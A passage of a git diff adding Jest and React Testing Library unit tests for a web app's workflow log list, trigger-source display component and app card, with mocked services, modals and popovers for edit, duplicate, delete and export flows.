createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(4) // 1 header + 3 data rows + }) + + it('should handle logs with missing workflow_run data gracefully', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + elapsed_time: 0, + total_tokens: 0, + }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('0.000s')).toBeInTheDocument() + 
expect(screen.getByText('0')).toBeInTheDocument() + }) + + it('should handle null workflow_run.triggered_from for non-workflow apps', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + triggered_from: undefined as any, + }), + }), + ]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.tsx b/web/app/components/app/workflow-log/list.tsx index 0e9b5dd67f..cef8a98f44 100644 --- a/web/app/components/app/workflow-log/list.tsx +++ b/web/app/components/app/workflow-log/list.tsx @@ -12,7 +12,7 @@ import Drawer from '@/app/components/base/drawer' import Indicator from '@/app/components/header/indicator' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { WorkflowRunTriggeredFrom } from '@/models/log' type ILogs = { diff --git a/web/app/components/app/workflow-log/trigger-by-display.spec.tsx b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx new file mode 100644 index 0000000000..6e95fc2f35 --- /dev/null +++ b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx @@ -0,0 +1,371 @@ +/** + * TriggerByDisplay Component Tests + * + * Tests the display of workflow trigger sources with appropriate icons and labels. + * Covers all trigger types: app-run, debugging, webhook, schedule, plugin, rag-pipeline. 
+ */ + +import { render, screen } from '@testing-library/react' +import TriggerByDisplay from './trigger-by-display' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import type { TriggerMetadata } from '@/models/log' +import { Theme } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +let mockTheme = Theme.light +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => ({ theme: mockTheme }), +})) + +// Mock BlockIcon as it has complex dependencies +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: ({ type, toolIcon }: { type: string; toolIcon?: string }) => ( +
    + BlockIcon +
    + ), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createTriggerMetadata = (overrides: Partial = {}): TriggerMetadata => ({ + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('TriggerByDisplay', () => { + beforeEach(() => { + jest.clearAllMocks() + mockTheme = Theme.light + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render icon container', () => { + const { container } = render( + , + ) + + // Should have icon container with flex layout + const iconContainer = container.querySelector('.flex.items-center.justify-center') + expect(iconContainer).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should apply custom className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('custom-class') + }) + + it('should show text by default (showText defaults to true)', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should hide text when showText is false', () => { + render( + , + ) + + expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() + }) + }) + + // 
-------------------------------------------------------------------------- + // Trigger Type Display Tests + // -------------------------------------------------------------------------- + describe('Trigger Types', () => { + it('should display app-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should display debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.debugging')).toBeInTheDocument() + }) + + it('should display webhook trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.webhook')).toBeInTheDocument() + }) + + it('should display schedule trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.schedule')).toBeInTheDocument() + }) + + it('should display plugin trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should display rag-pipeline-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineRun')).toBeInTheDocument() + }) + + it('should display rag-pipeline-debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineDebugging')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Plugin Metadata Tests + // -------------------------------------------------------------------------- + describe('Plugin Metadata', () => { + it('should display custom event name from plugin metadata', () => { + const metadata = createTriggerMetadata({ event_name: 'Custom Plugin Event' }) + + render( + , + ) + + expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() + }) + + it('should fallback to default plugin text when no event_name', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + 
expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should use plugin icon from metadata in light theme', () => { + mockTheme = Theme.light + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use dark plugin icon in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'dark-icon.png') + }) + + it('should fallback to light icon when dark icon not available in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use default BlockIcon when plugin has no icon metadata', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', '') + }) + }) + + // -------------------------------------------------------------------------- + // Icon Rendering Tests + // -------------------------------------------------------------------------- + describe('Icon Rendering', () => { + it('should render WindowCursor icon for app-run trigger', () => { + const { container } = render( + , + ) + + // Check for the blue brand background used for app-run icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-brand-blue-brand-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Code icon for debugging trigger', () => { + const { container } = render( + , + ) 
+ + // Check for the blue background used for debugging icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render WebhookLine icon for webhook trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for webhook icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Schedule icon for schedule trigger', () => { + const { container } = render( + , + ) + + // Check for the violet background used for schedule icon + const iconWrapper = container.querySelector('.bg-util-colors-violet-violet-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render KnowledgeRetrieval icon for rag-pipeline triggers', () => { + const { container } = render( + , + ) + + // Check for the green background used for rag pipeline icon + const iconWrapper = container.querySelector('.bg-util-colors-green-green-500') + expect(iconWrapper).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle unknown trigger type gracefully', () => { + // Test with a type cast to simulate unknown trigger type + render() + + // Should fallback to default (app-run) icon styling + expect(screen.getByText('unknown-type')).toBeInTheDocument() + }) + + it('should handle undefined triggerMetadata', () => { + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should handle empty className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex', 'items-center', 'gap-1.5') + }) + + it('should render correctly when both 
showText is false and metadata is provided', () => { + const metadata = createTriggerMetadata({ event_name: 'Test Event' }) + + render( + , + ) + + // Text should not be visible even with metadata + expect(screen.queryByText('Test Event')).not.toBeInTheDocument() + expect(screen.queryByText('appLog.triggerBy.plugin')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Theme Switching Tests + // -------------------------------------------------------------------------- + describe('Theme Switching', () => { + it('should render correctly in light theme', () => { + mockTheme = Theme.light + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render correctly in dark theme', () => { + mockTheme = Theme.dark + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/app-card.spec.tsx b/web/app/components/apps/app-card.spec.tsx new file mode 100644 index 0000000000..f7ff525ed2 --- /dev/null +++ b/web/app/components/apps/app-card.spec.tsx @@ -0,0 +1,1387 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { AppModeEnum } from '@/types/app' +import { AccessMode } from '@/models/access-control' + +// Mock next/navigation +const mockPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + }), +})) + +// Mock use-context-selector with stable mockNotify reference for tracking calls +// Include createContext for components that use it (like Toast) +const mockNotify = jest.fn() +jest.mock('use-context-selector', () => { + const React = require('react') + return { + createContext: (defaultValue: any) => React.createContext(defaultValue), + useContext: () => ({ + notify: mockNotify, + }), + useContextSelector: (_context: any, selector: any) => selector({ + notify: mockNotify, + 
}), + } +}) + +// Mock app context +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: true, + }), +})) + +// Mock provider context +const mockOnPlanInfoChanged = jest.fn() +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + onPlanInfoChanged: mockOnPlanInfoChanged, + }), +})) + +// Mock global public store - allow dynamic configuration +let mockWebappAuthEnabled = false +jest.mock('@/context/global-public-context', () => ({ + useGlobalPublicStore: (selector: (s: any) => any) => selector({ + systemFeatures: { + webapp_auth: { enabled: mockWebappAuthEnabled }, + branding: { enabled: false }, + }, + }), +})) + +// Mock API services - import for direct manipulation +import * as appsService from '@/service/apps' +import * as workflowService from '@/service/workflow' + +jest.mock('@/service/apps', () => ({ + deleteApp: jest.fn(() => Promise.resolve()), + updateAppInfo: jest.fn(() => Promise.resolve()), + copyApp: jest.fn(() => Promise.resolve({ id: 'new-app-id' })), + exportAppConfig: jest.fn(() => Promise.resolve({ data: 'yaml: content' })), +})) + +jest.mock('@/service/workflow', () => ({ + fetchWorkflowDraft: jest.fn(() => Promise.resolve({ environment_variables: [] })), +})) + +jest.mock('@/service/explore', () => ({ + fetchInstalledAppList: jest.fn(() => Promise.resolve({ installed_apps: [{ id: 'installed-1' }] })), +})) + +jest.mock('@/service/access-control', () => ({ + useGetUserCanAccessApp: () => ({ + data: { result: true }, + isLoading: false, + }), +})) + +// Mock hooks +const mockOpenAsyncWindow = jest.fn() +jest.mock('@/hooks/use-async-window-open', () => ({ + useAsyncWindowOpen: () => mockOpenAsyncWindow, +})) + +// Mock utils +jest.mock('@/utils/app-redirection', () => ({ + getRedirection: jest.fn(), +})) + +jest.mock('@/utils/var', () => ({ + basePath: '', +})) + +jest.mock('@/utils/time', () => ({ + formatTime: () => 'Jan 1, 2024', +})) + +// Mock dynamic imports 
+jest.mock('next/dynamic', () => { + const React = require('react') + return (importFn: () => Promise) => { + const fnString = importFn.toString() + + if (fnString.includes('create-app-modal') || fnString.includes('explore/create-app-modal')) { + return function MockEditAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'edit-app-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-edit-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Updated App', + icon_type: 'emoji', + icon: '🎯', + icon_background: '#FFEAD5', + description: 'Updated description', + use_icon_as_answer_icon: false, + max_active_requests: null, + }), + 'data-testid': 'confirm-edit-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('duplicate-modal')) { + return function MockDuplicateAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'duplicate-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-duplicate-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Copied App', + icon_type: 'emoji', + icon: '📋', + icon_background: '#E4FBCC', + }), + 'data-testid': 'confirm-duplicate-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('switch-app-modal')) { + return function MockSwitchAppModal({ show, onClose, onSuccess }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'switch-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-switch-modal' }, 'Close'), + React.createElement('button', { 'onClick': onSuccess, 'data-testid': 'confirm-switch-modal' }, 'Switch'), + ) + } + } + if (fnString.includes('base/confirm')) { + return function MockConfirm({ isShow, onCancel, onConfirm }: any) { + if (!isShow) return null + return 
React.createElement('div', { 'data-testid': 'confirm-dialog' },
+          React.createElement('button', { 'onClick': onCancel, 'data-testid': 'cancel-confirm' }, 'Cancel'),
+          React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-confirm' }, 'Confirm'),
+        )
+      }
+    }
+    if (fnString.includes('dsl-export-confirm-modal')) {
+      return function MockDSLExportModal({ onClose, onConfirm }: any) {
+        return React.createElement('div', { 'data-testid': 'dsl-export-modal' },
+          React.createElement('button', { 'onClick': () => onClose?.(), 'data-testid': 'close-dsl-export' }, 'Close'),
+          React.createElement('button', { 'onClick': () => onConfirm?.(true), 'data-testid': 'confirm-dsl-export' }, 'Export with secrets'),
+          React.createElement('button', { 'onClick': () => onConfirm?.(false), 'data-testid': 'confirm-dsl-export-no-secrets' }, 'Export without secrets'),
+        )
+      }
+    }
+    if (fnString.includes('app-access-control')) {
+      return function MockAccessControl({ onClose, onConfirm }: any) {
+        return React.createElement('div', { 'data-testid': 'access-control-modal' },
+          React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-access-control' }, 'Close'),
+          React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-access-control' }, 'Confirm'),
+        )
+      }
+    }
+    return () => null
+  }
+})
+
+// Popover uses @headlessui/react portals - mock for controlled interaction testing
+jest.mock('@/app/components/base/popover', () => {
+  // Must require React inside the factory: jest.mock is hoisted above imports,
+  // so referencing the module-scope `React` import here fails the
+  // babel-plugin-jest-hoist out-of-scope-variable check.
+  const React = require('react')
+  const MockPopover = ({ htmlContent, btnElement, btnClassName }: any) => {
+    const [isOpen, setIsOpen] = React.useState(false)
+    const computedClassName = typeof btnClassName === 'function' ?
btnClassName(isOpen) : ''
+    return React.createElement('div', { 'data-testid': 'custom-popover', 'className': computedClassName },
+      React.createElement('div', {
+        'onClick': () => setIsOpen(!isOpen),
+        'data-testid': 'popover-trigger',
+      }, btnElement),
+      isOpen && React.createElement('div', {
+        'data-testid': 'popover-content',
+        'onMouseLeave': () => setIsOpen(false),
+      },
+      typeof htmlContent === 'function' ? htmlContent({ open: isOpen, onClose: () => setIsOpen(false), onClick: () => setIsOpen(false) }) : htmlContent,
+      ),
+    )
+  }
+  return { __esModule: true, default: MockPopover }
+})
+
+// Tooltip uses portals - minimal mock preserving popup content as title attribute
+jest.mock('@/app/components/base/tooltip', () => {
+  // Require React inside the hoisted factory (out-of-scope `React` is rejected
+  // by babel-plugin-jest-hoist).
+  const React = require('react')
+  return {
+    __esModule: true,
+    default: ({ children, popupContent }: any) => React.createElement('div', { title: popupContent }, children),
+  }
+})
+
+// TagSelector has API dependency (service/tag) - mock for isolated testing
+jest.mock('@/app/components/base/tag-management/selector', () => ({
+  __esModule: true,
+  default: ({ tags }: any) => {
+    const React = require('react')
+    return React.createElement('div', { 'aria-label': 'tag-selector' },
+      tags?.map((tag: any) => React.createElement('span', { key: tag.id }, tag.name)),
+    )
+  },
+}))
+
+// AppTypeIcon has complex icon mapping - mock for focused component testing
+jest.mock('@/app/components/app/type-selector', () => {
+  // Require React inside the hoisted factory (out-of-scope `React` is rejected
+  // by babel-plugin-jest-hoist).
+  const React = require('react')
+  return {
+    AppTypeIcon: () => React.createElement('div', { 'data-testid': 'app-type-icon' }),
+  }
+})
+
+// Import component after mocks
+import AppCard from './app-card'
+
+// ============================================================================
+// Test Data Factories
+// ============================================================================
+
+const createMockApp = (overrides: Record<string, any> = {}) => ({
+  id: 'test-app-id',
+  name: 'Test App',
+  description: 'Test app description',
+  mode: AppModeEnum.CHAT,
+  icon: '🤖',
+  icon_type: 'emoji' as const,
+  icon_background: '#FFEAD5',
icon_url: null, + author_name: 'Test Author', + created_at: 1704067200, + updated_at: 1704153600, + tags: [], + use_icon_as_answer_icon: false, + max_active_requests: null, + access_mode: AccessMode.PUBLIC, + has_draft_trigger: false, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as any, + app_model_config: {} as any, + site: {} as any, + api_base_url: 'https://api.example.com', + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('AppCard', () => { + const mockApp = createMockApp() + const mockOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + mockOpenAsyncWindow.mockReset() + mockWebappAuthEnabled = false + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + // Use title attribute to target specific element + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app name', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should display app description', () => { + render() + expect(screen.getByTitle('Test app description')).toBeInTheDocument() + }) + + it('should display author name', () => { + render() + expect(screen.getByTitle('Test Author')).toBeInTheDocument() + }) + + it('should render app icon', () => { + // AppIcon component renders the emoji icon from app data + const { container } = render() + // Check that the icon container is rendered (AppIcon renders within the card) + const iconElement = container.querySelector('[class*="icon"]') || container.querySelector('img') + expect(iconElement || screen.getByText(mockApp.icon)).toBeTruthy() + }) + + it('should render app type icon', () => { + render() + expect(screen.getByTestId('app-type-icon')).toBeInTheDocument() + }) + + it('should display formatted edit 
time', () => { + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should handle different app modes', () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle app with tags', () => { + const appWithTags = { + ...mockApp, + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + } + render() + // Verify the tag selector component renders + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should render with onRefresh callback', () => { + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('Access Mode Icons', () => { + it('should show public icon for public access mode', () => { + const publicApp = { ...mockApp, access_mode: AccessMode.PUBLIC } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.anyone"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show lock icon for specific groups access mode', () => { + const specificApp = { ...mockApp, access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.specific"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show organization icon for organization access mode', () => { + const orgApp = { ...mockApp, access_mode: AccessMode.ORGANIZATION } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.organization"]') + expect(tooltip).toBeInTheDocument() + }) + + it('should show external icon for external access mode', () => { + const externalApp = { ...mockApp, access_mode: AccessMode.EXTERNAL_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.external"]') + 
expect(tooltip).toBeInTheDocument() + }) + }) + + describe('Card Interaction', () => { + it('should handle card click', () => { + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]') + expect(card).toBeInTheDocument() + }) + + it('should call getRedirection on card click', () => { + const { getRedirection } = require('@/utils/app-redirection') + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]')! + fireEvent.click(card) + expect(getRedirection).toHaveBeenCalledWith(true, mockApp, mockPush) + }) + }) + + describe('Operations Menu', () => { + it('should render operations popover', () => { + render() + expect(screen.getByTestId('custom-popover')).toBeInTheDocument() + }) + + it('should show edit option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should show duplicate option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + }) + }) + + it('should show export option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.export')).toBeInTheDocument() + }) + }) + + it('should show delete option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + + it('should show switch option for chat mode apps', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + 
expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should show switch option for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should not show switch option for workflow mode apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.queryByText(/switch/i)).not.toBeInTheDocument() + }) + }) + }) + + describe('Modal Interactions', () => { + it('should open edit modal when edit button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const editButton = screen.getByText('app.editApp') + fireEvent.click(editButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + }) + + it('should open duplicate modal when duplicate button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const duplicateButton = screen.getByText('app.duplicate') + fireEvent.click(duplicateButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + }) + + it('should open confirm dialog when delete button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + }) + + it('should close confirm dialog when cancel is clicked', async () => { + render() + + 
fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('cancel-confirm')) + + await waitFor(() => { + expect(screen.queryByTestId('confirm-dialog')).not.toBeInTheDocument() + }) + }) + + it('should close edit modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-edit-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('edit-app-modal')).not.toBeInTheDocument() + }) + }) + + it('should close duplicate modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-duplicate-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('duplicate-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Styling', () => { + it('should have correct card container styling', () => { + const { container } = render() + const card = container.querySelector('[class*="h-[160px]"]') + expect(card).toBeInTheDocument() + }) + + it('should have rounded corners', () => { + const { container } = render() + const card = container.querySelector('[class*="rounded-xl"]') + expect(card).toBeInTheDocument() + }) + }) + + describe('API Callbacks', () => { + it('should call 
deleteApp API when confirming delete', async () => { + render() + + // Open popover and click delete + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + // Confirm delete + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + }) + }) + + it('should call onRefresh after successful delete', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should handle delete failure', async () => { + (appsService.deleteApp as jest.Mock).mockRejectedValueOnce(new Error('Delete failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Delete failed') }) + }) + }) + + it('should call updateAppInfo API when editing app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + 
fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + }) + }) + + it('should call copyApp API when duplicating app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + }) + }) + + it('should call onPlanInfoChanged after successful duplication', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(mockOnPlanInfoChanged).toHaveBeenCalled() + }) + }) + + it('should handle copy failure', async () => { + (appsService.copyApp as jest.Mock).mockRejectedValueOnce(new Error('Copy failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + }) + + it('should call exportAppConfig API when exporting', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + 
expect(appsService.exportAppConfig).toHaveBeenCalled() + }) + }) + + it('should handle export failure', async () => { + (appsService.exportAppConfig as jest.Mock).mockRejectedValueOnce(new Error('Export failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + describe('Switch Modal', () => { + it('should open switch modal when switch button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + + it('should close switch modal when close button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) 